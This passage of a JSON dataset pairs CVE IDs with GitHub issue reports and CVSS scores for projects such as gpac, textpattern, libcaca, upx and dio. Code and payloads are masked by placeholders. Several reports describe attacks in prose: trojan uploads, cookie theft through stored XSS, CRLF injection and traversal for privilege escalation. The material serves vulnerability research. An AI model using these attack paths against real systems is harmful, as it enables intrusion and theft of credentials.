        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-30199",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1728",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1728",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-04-02T10:42:56Z",
        "description": "A Null Pointer Dereference In function gf_filter_pck_get_data. In APITAG There is a Null Pointer Dereference, when call APITAG . The first arg pck may be null with a crafted mp4 file. The command line: FILETAG In gdb: FILETAG The crafted file: FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-30209",
        "Issue_Url_old": "https://github.com/textpattern/textpattern/issues/1655",
        "Issue_Url_new": "https://github.com/textpattern/textpattern/issues/1655",
        "Repo_new": "textpattern/textpattern",
        "Issue_Created_At": "2021-03-18T13:11:46Z",
        "description": "Hi I found two loopholes.. Hi I found two loopholes. In version NUMBERTAG The first one: The location where the plug in is uploaded in the background without any security verification. You can upload Trojan files to obtain system permissions. The second one: the storage type xss exists in the place where the article is written. Next are the details of the exploit: The first vulnerability: Because the backend login location does not have a verification code and no lock policy is set, if an attacker enters the backend through brute force cracking, the attacker can upload the php Trojan file, because the file path after saving is regular , So the attacker can connect to the Trojan horse file through a hacker tool to obtain system permissions. FILETAG Access to Trojan files to verify that the vulnerability exists. FILETAG Hacking tools connect to Trojan files to obtain system permissions. FILETAG The second vulnerability: If a low privilege user uses the vulnerability to write malicious code and publish it, all people who view this article will be attacked. He can obtain the administrator\u2019s cookie information, and the administrator\u2019s cookie can be used directly by the administrator. Log in to the background system with permission. You can also continue to exploit the first vulnerability after logging in. FILETAG The administrator's access to the article triggers a pop up window to verify that the vulnerability exists. FILETAG The attacker obtains the administrator cookie. FILETAG Repair suggestions: The first vulnerability: verify the format of the uploaded file, verify the content of the file, and set the uploaded file name to random. The second vulnerability: html entity conversion or filtering of sensitive words input by the user, such as <, >,', \", script.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-30218",
        "Issue_Url_old": "https://github.com/michaelforney/samurai/issues/67",
        "Issue_Url_new": "https://github.com/michaelforney/samurai/issues/67",
        "Repo_new": "michaelforney/samurai",
        "Issue_Created_At": "2021-04-02T17:48:35Z",
        "description": "NULL pointer dereference in the APITAG function. Hi, While fuzzing samurai NUMBERTAG and git nightly repo), I found a NULL pointer dereference in the APITAG function, in util.c. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-30219",
        "Issue_Url_old": "https://github.com/michaelforney/samurai/issues/68",
        "Issue_Url_new": "https://github.com/michaelforney/samurai/issues/68",
        "Repo_new": "michaelforney/samurai",
        "Issue_Created_At": "2021-04-02T17:58:51Z",
        "description": "NULL pointer dereference in the APITAG function. Hi, While fuzzing samurai NUMBERTAG and git nightly repo), I found a NULL pointer dereference in the APITAG function, in build.c. CODETAG In the code snippet, it seems there are no checks on cmd parameter which leads to set the variable description to NULL on L NUMBERTAG and then on L NUMBERTAG it dereferences the NULL Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-30227",
        "Issue_Url_old": "https://github.com/emlog/emlog/issues/79",
        "Issue_Url_new": "https://github.com/emlog/emlog/issues/79",
        "Repo_new": "emlog/emlog",
        "Issue_Created_At": "2021-04-05T09:06:50Z",
        "description": "emlog NUMBERTAG has XSS Vulnerability . \u5728\u6587\u7ae0\u8bc4\u8bba\u5904\u63d0\u4ea4\u8bc4\u8bba FILETAG \u7136\u540e\u5728\u540e\u53f0\u67e5\u770b\u8bc4\u8bba\uff0c\u70b9\u51fb FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-30246",
        "Issue_Url_old": "https://github.com/kjur/jsrsasign/issues/478",
        "Issue_Url_new": "https://github.com/kjur/jsrsasign/issues/478",
        "Repo_new": "kjur/jsrsasign",
        "Issue_Created_At": "2021-04-02T05:31:06Z",
        "description": "Leniency in parsing block type byte and padding bytes for PKCS NUMBERTAG signature verification. Another finding besides the incompatibility issue reported here URLTAG for PKCS NUMBERTAG signature verification, is the leniency in parsing the prefix of PKCS NUMBERTAG structure. Background. The prefix to the top ASN NUMBERTAG structure of the PKCS NUMBERTAG encoded message consists of leading byte ( APITAG ), block type byte ( APITAG for RSA signing scheme), padding bytes ( APITAG ), and the end of padding ( APITAG ). The length of padding bytes should also be at least NUMBERTAG bytes and computed such that the final length of the PKCS NUMBERTAG encoded message is equal to the length of public modolous N (denoted by APITAG ). Block type byte is there to indicate to which RSA scheme this encoded message is belonged. The end of padding also specifies where padding bytes actually ends. The leading byte ( APITAG ) also guarantees that the integer representative of the encoded message is not greater than or equal to the public modolous N . By and large, the prefix bytes should satisfy the requirements in order for RSA PKS NUMBERTAG signature scheme to be able to hold on to its security promises. Problem. However, jsrsasign APITAG is lenient in checking such requirements and some other invalid signatures are mistakenly recognized to be valid. As will be shown below in the snippet taken from the source code, the issue arises because the implementation ignores the initial APITAG bytes as they will disappear in octet strings to integer translation and more importantly the fact that an incorrect regex pattern matching is being used to peel off the prefix from the the top ASN NUMBERTAG structure. This bug seems to be of similar type previously reported on RSA PSS signature validation URLTAG . More detailed root cause analysis. In line APITAG @ APITAG function in APITAG file, the initial APITAG bytes will be ignored when octet strings are converted to integer ( APITAG ) and converted back to octet strings after taking modular exponentiation to the power public exponent ( APITAG and APITAG ). The regex being used in APITAG to remove the prefix only checks for the initial string APITAG . So, it does not actually check for the padding bytes ( APITAG ) and can be bypassed by long initial zeros (examples are given). ERRORTAG Implication: APITAG issue) As this might not be susceptible to an immediate signature forgery attack because without the ability to hide random bytes, the attack cost seems to be prohibitive. However, this can simply create an interoperability issue. Reference notation and concrete values N : public modulus APITAG : length of public modulus d : private exponent e : public exponent H : hash function m : message I : to be singed RSA PKCS NUMBERTAG signature scheme input structure S : signature value obtained by APITAG CODETAG Example NUMBERTAG Padding bytes with length NUMBERTAG APITAG CODETAG Example NUMBERTAG All zero bytes as prefix CODETAG CODETAG Example NUMBERTAG It can start with some number of APITAG bytes, and then APITAG byte followed by some APITAG bytes ending with APITAG byte. CODETAG CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-30476",
        "Issue_Url_old": "https://github.com/hashicorp/terraform-provider-vault/issues/996",
        "Issue_Url_new": "https://github.com/hashicorp/terraform-provider-vault/issues/996",
        "Repo_new": "hashicorp/terraform-provider-vault",
        "Issue_Created_At": "2021-03-12T18:05:11Z",
        "description": "vault_gcp_auth_backend_role does not apply bound_labels. The APITAG resource does not apply bound_labels URLTAG to the vault auth method. Earlier this week while debugging an issue I tried to authenticate to my vault from a VM that did not have the the APITAG that I had defined in my terraform configuration... To my surprise my authentication was successful, this led me down the route of finding out why terraform was lying to me. Terraform Version APITAG Affected Resource(s) vault_gcp_auth_backend_role Terraform Configuration Files CODETAG Expected Behavior Terraform should apply the security controls that it says it does for the vault provider. Actual Behavior Terraform does not install the APITAG configuration to the APITAG resource. Steps to Reproduce CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-30498",
        "Issue_Url_old": "https://github.com/cacalabs/libcaca/issues/53",
        "Issue_Url_new": "https://github.com/cacalabs/libcaca/issues/53",
        "Repo_new": "cacalabs/libcaca",
        "Issue_Created_At": "2021-04-07T02:31:14Z",
        "description": "[ Security] heap buffer overflow of export.c in function export_tga. Hi libcaca Team When I use the libfuzz test library API, I found an overflow error. Here are the steps to reproduce and my running environment System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG Fedora NUMBERTAG clang NUMBERTAG gcc NUMBERTAG erification steps\uff1a APITAG the source code of libcaca APITAG the libcaca.so library APITAG or CODETAG APITAG the poc_tga.cc && build ERRORTAG NUMBERTAG compile poc_tga.cc APITAG APITAG poc_tga asan info: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-30499",
        "Issue_Url_old": "https://github.com/cacalabs/libcaca/issues/54",
        "Issue_Url_new": "https://github.com/cacalabs/libcaca/issues/54",
        "Repo_new": "cacalabs/libcaca",
        "Issue_Created_At": "2021-04-07T02:36:51Z",
        "description": "APITAG global buffer overflow of export.c in function export_troff. Hi libcaca Team When I use the libfuzz test library API, I found an overflow error. Here are the steps to reproduce and my running environment System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG Fedora NUMBERTAG clang NUMBERTAG gcc NUMBERTAG libcaca version APITAG Verification steps\uff1a APITAG the source code of libcaca APITAG the libcaca.so library APITAG or CODETAG APITAG the poc_troff.cc && build ERRORTAG NUMBERTAG compile poc_troff.cc CODETAG APITAG poc_troff asan info: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-30500",
        "Issue_Url_old": "https://github.com/upx/upx/issues/485",
        "Issue_Url_new": "https://github.com/upx/upx/issues/485",
        "Repo_new": "upx/upx",
        "Issue_Created_At": "2021-04-07T02:45:58Z",
        "description": "Null pointer dereference in function APITAG APITAG What's the problem (or question)? Null pointer dereference was discovered in upx in the latest commit of the devel branch. FILETAG Please tell us details about your environment. UPX version used ( APITAG ): CODETAG Host Operating System and version: OS: Ubuntu NUMBERTAG LTS NUMBERTAG Host CPU architecture: CPU: Intel i NUMBERTAG GHz Target Operating System and version: same as Host Target CPU architecture: same as Host",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-30501",
        "Issue_Url_old": "https://github.com/upx/upx/issues/486",
        "Issue_Url_new": "https://github.com/upx/upx/issues/486",
        "Repo_new": "upx/upx",
        "Issue_Created_At": "2021-04-07T07:13:11Z",
        "description": "APITAG assertions again in function APITAG APITAG What's the problem (or question)? Same problem like issue NUMBERTAG URLTAG but not fix all the bug position. APITAG is attempted to be allocated with NUMBERTAG bytes, failing an assertion in APITAG asan CODETAG gdb ERRORTAG What should have happened? No failed assertions. Do you have an idea for a solution? Either remove the assertion (probably easier), or add logic to check that allocations are NUMBERTAG bytes. or like the c NUMBERTAG b NUMBERTAG URLTAG add some sanitize code. How can we reproduce the issue? APITAG UPX APITAG NUMBERTAG Run APITAG zipped poc : FILETAG Please tell us details about your environment. UPX version used ( APITAG ): CODETAG Host Operating System and version: APITAG Host CPU architecture: APITAG Target Operating System and version: same as Host Target CPU architecture: same as Host",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-30637",
        "Issue_Url_old": "https://github.com/danpros/htmly/issues/456",
        "Issue_Url_new": "https://github.com/danpros/htmly/issues/456",
        "Repo_new": "danpros/htmly",
        "Issue_Created_At": "2021-04-13T03:26:18Z",
        "description": "The code has stored XSS vulnerabilities. The XSS filtering of blog title, Tagline, and Description in FILETAG is not rigorous, resulting in the generation of stored XSS FILETAG FILETAG Front display FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-31162",
        "Issue_Url_old": "https://github.com/rust-lang/rust/issues/83618",
        "Issue_Url_new": "https://github.com/rust-lang/rust/issues/83618",
        "Repo_new": "rust-lang/rust",
        "Issue_Created_At": "2021-03-28T20:48:16Z",
        "description": "Double free in Vec::from_iter specialization when drop panics. URLTAG URLTAG APITAG calls APITAG . APITAG calls APITAG before overwriting the pointer. As a result, dropped elements are not invalidated and dropped again under panic. APITAG ERRORTAG Output: CODETAG Tested with APITAG . Here is a playground link URLTAG to the code snippet.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-31254",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1703",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1703",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-03-11T08:32:34Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-31255",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1733",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1733",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-04-08T04:06:31Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-31256",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1705",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1705",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-03-12T02:25:29Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-31257",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1734",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1734",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-04-08T04:07:59Z",
        "description": "null dereference in APITAG APITAG Hi, There is a null dereference issue with gpac APITAG can reproduce on the lattest commit. Steps To Reproduce build: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-31258",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1706",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1706",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-03-12T06:50:09Z",
        "description": "null dereference issue with APITAG Hi, There is a null dereference issue with APITAG can reproduce on the lattest commit aka APITAG Steps to reproduce build with asan: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-31259",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1735",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1735",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-04-08T07:10:40Z",
        "description": "null dereference in APITAG APITAG Hi, There is a null dereference issue with gpac APITAG can reproduce on the lattest commit. Steps To Reproduce build: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-31260",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1736",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1736",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-04-08T07:11:57Z",
        "description": "null dereference in APITAG APITAG Hi, There is a null dereference issue with gpac APITAG can reproduce on the lattest commit. Steps To Reproduce build: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-31261",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1737",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1737",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-04-09T00:56:24Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-31262",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1738",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1738",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-04-09T00:57:41Z",
        "description": "null dereference in APITAG Hi, There is a null dereference issue with gpac APITAG can reproduce on the lattest commit. Steps To Reproduce build: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-31272",
        "Issue_Url_old": "https://github.com/SerenityOS/serenity/issues/3991",
        "Issue_Url_new": "https://github.com/serenityos/serenity/issues/3991",
        "Repo_new": "serenityos/serenity",
        "Issue_Created_At": "2020-11-08T04:03:18Z",
        "description": "tar: Directory traversal vulnerability may lead to privilege escalation. APITAG FILETAG Most of the file system is mounted read only. However, we can overwrite APITAG to gain privileges next time root uses APITAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-31272",
        "Issue_Url_old": "https://github.com/SerenityOS/serenity/issues/3992",
        "Issue_Url_new": "https://github.com/serenityos/serenity/issues/3992",
        "Repo_new": "serenityos/serenity",
        "Issue_Created_At": "2020-11-08T04:20:52Z",
        "description": "unzip: Directory traversal vulnerability may lead to command execution / privilege escalation. Same issue as NUMBERTAG in tar . FILETAG This could also be used to gain command execution on the host, or elevate privileges to the anon user from a lower privileged user, in the event that anon extracts a malicious tar file. Command execution via APITAG (as root ) or APITAG (as anon ).",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-31327",
        "Issue_Url_old": "https://github.com/remoteclinic/RemoteClinic/issues/14",
        "Issue_Url_new": "https://github.com/remoteclinic/remoteclinic/issues/14",
        "Repo_new": "remoteclinic/remoteclinic",
        "Issue_Created_At": "2021-04-14T10:01:09Z",
        "description": "Stored XSS vulnerability in /medicines. Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: URLTAG Step to Reproduce NUMBERTAG Login in Application as Doctor NUMBERTAG When you scroll down the main dashboard page, there is medicines options, Click APITAG Medicine\". FILETAG NUMBERTAG Here is a APITAG Name\" Field which is vulnerable to XSS. Inject XSS Payload: FILETAG FILETAG NUMBERTAG You can see there is client side validation on Medicine Name with maxlength is NUMBERTAG but not validate on server side. FILETAG NUMBERTAG Change maxlength to NUMBERTAG FILETAG NUMBERTAG Now Click on Register. FILETAG NUMBERTAG SS Executed on FILETAG FILETAG NUMBERTAG Now go to /medicines, Click on Show All. FILETAG NUMBERTAG SS Executed on /medicines. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-31329",
        "Issue_Url_old": "https://github.com/remoteclinic/RemoteClinic/issues/16",
        "Issue_Url_new": "https://github.com/remoteclinic/remoteclinic/issues/16",
        "Repo_new": "remoteclinic/remoteclinic",
        "Issue_Created_At": "2021-04-14T12:58:52Z",
        "description": "Stored XSS vulnerability in FILETAG . Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: FILETAG Step to Reproduce NUMBERTAG Login in Application as Doctor NUMBERTAG Create New Staff Member. FILETAG NUMBERTAG Register as a Doctor. FILETAG NUMBERTAG Here is two fields APITAG and APITAG Address\" which is vulnerable to XSS, inject with XSS Payload: FILETAG FILETAG NUMBERTAG Now Click on Register. FILETAG NUMBERTAG Profile Created. FILETAG NUMBERTAG Now Signout. FILETAG NUMBERTAG Login with that Staff Member which you registered as a Doctor. FILETAG NUMBERTAG Now go to My Profile. FILETAG NUMBERTAG SS Executed. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-31402",
        "Issue_Url_old": "https://github.com/flutterchina/dio/issues/1130",
        "Issue_Url_new": "https://github.com/cfug/dio/issues/1130",
        "Repo_new": "cfug/dio",
        "Issue_Created_At": "2021-04-15T08:40:27Z",
        "description": "CRLF in APITAG sec issue. New Issue Checklist x] I have searched for a similar issue in the [project URLTAG and found none Issue Info ENV: Any Examples generated on: ERRORTAG Issue Description and Steps Please consider given snippet: CODETAG Generated call looks like CODETAG Which presents a security issue. Classic CRLF injection. Vector attack: If the attacker controls the HTTP method(verb), he can change a call and steal all cookies, session whatever is in a call. Assuming flow like USER > FOO > BAR , where flow between FOO and BAR is internal, mentioned data may leak. Let's assume I'm replacing example.com with my hackery uservice.org and the victim(service) is working in a company behind the proxy. This means I can easily redirect calls with headers/cookies(tokens) and blah blah blah. By doing more advanced CRLF I can remove the requirement for proxy at all. Expected behavior: if HTTP method(verb) is invalid, raise error.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-31402",
        "Issue_Url_old": "https://github.com/cfug/dio/issues/1752",
        "Issue_Url_new": "https://github.com/cfug/dio/issues/1752",
        "Repo_new": "cfug/dio",
        "Issue_Created_At": "2023-03-21T16:54:52Z",
        "description": "CVE Dio NUMBERTAG Google OVS Scanner. Package dio Version NUMBERTAG Output of APITAG _No response_ Dart Version NUMBERTAG Steps to Reproduce Excute scanner in a flutter project with dio NUMBERTAG dependency. APITAG You can use Docker image from project URLTAG Expected Result Empty response from scanner. Actual Result CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-31407",
        "Issue_Url_old": "https://github.com/vaadin/osgi/issues/50",
        "Issue_Url_new": "https://github.com/vaadin/osgi/issues/50",
        "Repo_new": "vaadin/osgi",
        "Issue_Created_At": "2021-03-08T12:42:42Z",
        "description": "Vaadin OSGi applications should not expose relevant classpath content as static resources. In our OSGi examples ( URLTAG & URLTAG class files and other resources can be accessed from the main bundles. This is unexpected behaviour from the end users point of view and can be considered a bad practise. We should either change the implementation of our integration code so that generic content from bundle(s) is not served or change the examples so that only minimal and security wise safe content is exposed.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-31409",
        "Issue_Url_old": "https://github.com/vaadin/framework/issues/12240",
        "Issue_Url_new": "https://github.com/vaadin/framework/issues/12240",
        "Repo_new": "vaadin/framework",
        "Issue_Created_At": "2021-03-12T11:28:18Z",
        "description": "Vaadin NUMBERTAG Compatibility Server APITAG catastrophic exponential time regular expression. The issue NUMBERTAG reported yesterday as fixed in NUMBERTAG has not been adressed in vaadin compatibility server, yet. See FILETAG Could you please port the fix and provide a Vaadin NUMBERTAG release with the appropriate Vaadin NUMBERTAG compatibility implementation? Thanks!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-31525",
        "Issue_Url_old": "https://github.com/golang/go/issues/45710",
        "Issue_Url_new": "https://github.com/golang/go/issues/45710",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2021-04-22T19:53:59Z",
        "description": "http: APITAG can stack overflow. APITAG can stack overflow due to recursion when given a request with a very large header NUMBERTAG MB depending on the architecture). A APITAG which overrides the default max header of NUMBERTAG MB by setting APITAG to a much larger value could also be vulnerable in the same way. According to the new security policy NUMBERTAG this will be fixed as a PUBLIC track issue. Credit to Guido Vranken URLTAG who reported the crash as part of the Ethereum NUMBERTAG bounty program URLTAG . /cc APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-3163",
        "Issue_Url_old": "https://github.com/quilljs/quill/issues/3273",
        "Issue_Url_new": "https://github.com/quilljs/quill/issues/3273",
        "Repo_new": "quilljs/quill",
        "Issue_Created_At": "2021-01-14T22:05:36Z",
        "description": "Stored XSS in the Quill JS editor. Please describe the a concise description and fill out the details below. It will help others efficiently understand your request and get to an answer instead of repeated back and forth. Providing a minimal, complete and verifiable example URLTAG will further increase your chances that someone can help. Steps for Reproduction NUMBERTAG isit a page with the XSS scripting payload stored by an attacker (is there a more secure channel for reporting security bugs NUMBERTAG The payload executes Expected behavior : No XSS, no arbitrary Javascript execution Actual behavior : attackers can execute arbitrary Javascript Platforms : most browsers Include browser, operating system and respective versions firefox, windows NUMBERTAG ersion : Run APITAG to find out",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-3163",
        "Issue_Url_old": "https://github.com/quilljs/quill/issues/3359",
        "Issue_Url_new": "https://github.com/quilljs/quill/issues/3359",
